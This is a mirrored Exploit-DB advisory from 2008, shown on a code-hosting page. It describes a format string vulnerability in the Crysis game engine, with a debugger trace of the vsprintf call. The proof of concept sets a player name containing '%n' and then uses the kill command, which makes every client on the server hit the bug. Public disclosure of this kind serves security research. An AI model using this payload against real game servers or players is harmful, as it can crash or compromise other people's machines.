bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/5201.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
1.1 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

The Crysis engine passes along internal debug strings through the game. One of them is passed to vsprintf() in the crt lib:
30503263 8D8C24 10100000 LEA ECX,DWORD PTR SS:[ESP+1010]
3050326A 51 PUSH ECX
3050326B 50 PUSH EAX
3050326C 8D5424 08 LEA EDX,DWORD PTR SS:[ESP+8]
30503270 52 PUSH EDX
30503271 FF15 F8A17530 CALL DWORD PTR DS:[<&MSVCR80.vsprintf>] ; MSVCR80.vsprintf
0032CAD8 30503277 w2P0 /CALL to vsprintf from cryactio.30503271
0032CADC 0032CAE8 èÊ2. |buffer = 0032CAE8
0032CAE0 0032DAF8 øÚ2. |format = "Pathfinding in animation graph failed (LONGPOKE%SAAAAAAAA) - no path from 'Parachute_Float_NW' to 'X_Combat_IdleAimingNull_NW'" ; Your name is passed in as part of the format. This is a nono...
0032CAE4 0032DAF8 øÚ2. \arglist = 0032DAF8
POC:
Type name %n\x00\x00\x00\x00 in the console.
Type kill.
Upon your death, everyone in the server will instantly execute the format string vulnerability. If you are in third person in a vehicle, it will be exploited on your game as well.
-LONGPOKE<ATOM>
# milw0rm.com [2008-02-28]
Reference in a new issue View git blame Copy permalink